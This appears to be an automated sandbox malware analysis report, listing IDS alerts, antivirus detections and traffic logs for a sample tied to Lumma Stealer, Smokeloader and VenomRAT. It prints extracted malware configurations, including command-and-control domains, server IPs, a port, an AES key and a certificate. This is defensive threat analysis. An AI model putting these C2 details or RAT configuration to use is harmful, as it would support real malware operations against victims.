ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T07:44:59.418725+0200
SID:	2054604
Source Port:	62317
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T07:44:32.085320+0200
SID:	2054602
Source Port:	62287
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T07:44:34.786056+0200
SID:	2054604
Source Port:	62290
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:43:56.291406+0200
SID:	2039103
Source Port:	62247
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T07:44:26.379378+0200
SID:	2054602
Source Port:	62280
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 154.144.253.197

Timestamp:	2024-07-27T07:46:24.425999+0200
SID:	2039103
Source Port:	62379
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T07:44:33.995308+0200
SID:	2054653
Source Port:	62289
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T07:44:43.171318+0200
SID:	2054653
Source Port:	62302
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T07:44:28.792032+0200
SID:	2048094
Source Port:	62283
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T07:44:58.284227+0200
SID:	2054653
Source Port:	62315
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T07:43:54.281013+0200
SID:	2022930
Source Port:	443
Destination Port:	62245
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:44:23.587218+0200
SID:	2039103
Source Port:	62273
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:43:59.940793+0200
SID:	2039103
Source Port:	62250
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:43:23.015887+0200
SID:	2039103
Source Port:	62234
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:44:14.727736+0200
SID:	2039103
Source Port:	62259
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T07:44:38.229626+0200
SID:	2054604
Source Port:	62296
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-27T07:45:16.740499+0200
SID:	2054604
Source Port:	62336
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 186.145.236.93

Timestamp:	2024-07-27T07:43:29.561094+0200
SID:	2039103
Source Port:	62240
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 185.149.100.242 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T07:44:04.554660+0200
SID:	2011803
Source Port:	443
Destination Port:	62252
Protocol:	TCP
Classtype:	Executable code was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://callosallsaospz.shop/ly3$	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apiple-sto:s	Avira URL Cloud: Label: malware
Source: callosallsaospz.shop	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/api5	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/api-	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/api1	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/d3	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop:443/api	Avira URL Cloud: Label: malware
Source: https://mussangroup.com/wp-content/images/pic1.jpg	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/api	Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apidows	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\adjijwj

Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Found malware configuration

Source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}
Source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: VenomRAT {"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null"}
Source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: AsyncRAT {"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null", "External_config_on_Pastebin": "false"}
Source: EF14.exe.3868.9.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "pointer--"}

Multi AV Scanner detection for domain / URL

Source: liernessfornicsa.shop	Virustotal: Detection: 19%	Perma Link
Source: mussangroup.com	Virustotal: Detection: 13%	Perma Link
Source: callosallsaospz.shop	Virustotal: Detection: 19%	Perma Link
Source: callosallsaospz.shop	Virustotal: Detection: 19%	Perma Link
Source: https://callosallsaospz.shop/api1	Virustotal: Detection: 15%	Perma Link
Source: liernessfornicsa.shop	Virustotal: Detection: 19%	Perma Link
Source: https://callosallsaospz.shop/api-	Virustotal: Detection: 14%	Perma Link
Source: https://liernessfornicsa.shop/api_	Virustotal: Detection: 15%	Perma Link
Source: shepherdlyopzc.shop	Virustotal: Detection: 19%	Perma Link
Source: upknittsoappz.shop	Virustotal: Detection: 19%	Perma Link
Source: https://callosallsaospz.shop:443/api	Virustotal: Detection: 22%	Perma Link
Source: https://mussangroup.com/wp-content/images/pic1.jpg	Virustotal: Detection: 6%	Perma Link
Source: https://liernessfornicsa.shop/N	Virustotal: Detection: 15%	Perma Link
Source: unseaffarignsk.shop	Virustotal: Detection: 22%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\EF14.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll	ReversingLabs: Detection: 41%

Multi AV Scanner detection for submitted file

Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

Virustotal: Detection: 58%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\adjijwj	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

Joe Sandbox ML: detected

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 16_2_03067A10 CryptUnprotectData,

16_2_03067A10

Source: 8EC7.exe, 00000007.00000003.2363296649.000002E4A1111000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_ab5431ce-4

Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62336 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:62252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62253 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62254 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62255 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62258 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.4:62260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62261 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.168.2.4:62261 -> 107.173.160.137:443 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62266 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62270 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.4:62275 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62280 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:62279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62281 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62284 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62285 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62287 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62288 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62291 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62290 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62294 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62296 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62297 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62298 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62300 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62303 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62304 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62305 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62307 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62308 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.168.2.4:62312 -> 167.235.128.153:443 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62315 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62321 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62324 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62326 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62329 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62332 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62335 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62337 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62339 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62340 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62343 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62344 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62345 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62346 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62348 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62349 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62350 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62354 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62355 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62356 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62358 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62359 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62360 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62363 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62364 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62365 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62367 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62368 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62369 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62370 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62371 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62374 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62375 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62376 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62377 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62378 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62380 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62381 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62383 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62384 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62386 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62387 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62388 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62390 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62392 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62393 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62395 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62396 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62398 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62399 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62400 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62401 version: TLS 1.2

Source:	Binary string: System.Xml.ni.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: rust_dave_sideload.pdb source: vm.exe, 00000013.00000002.4123601062.000000006C8F8000.00000002.00000001.01000000.00000015.sdmp, lm.exe, 00000014.00000002.3069655853.000000006C888000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 0000001A.00000002.3227475624.000000006C8F8000.00000002.00000001.01000000.00000015.sdmp, g2m.dll0.14.dr
Source:	Binary string: System.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr
Source:	Binary string: BitLockerToGo.pdb source: EF14.exe, 00000009.00000003.2540291593.000001FBFFEF0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C000800000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000003.2540539671.000001FBFFEB0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2560742888.000000C000400000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B9E90000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.pdb) source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Xml.pdbMZ@ source: WER250C.tmp.dmp.29.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr
Source:	Binary string: BitLockerToGo.pdbGCTL source: EF14.exe, 00000009.00000003.2540291593.000001FBFFEF0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C000800000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000003.2540539671.000001FBFFEB0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2560742888.000000C000400000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: mscorlib.pdbl source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Xml.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER250C.tmp.dmp.29.dr
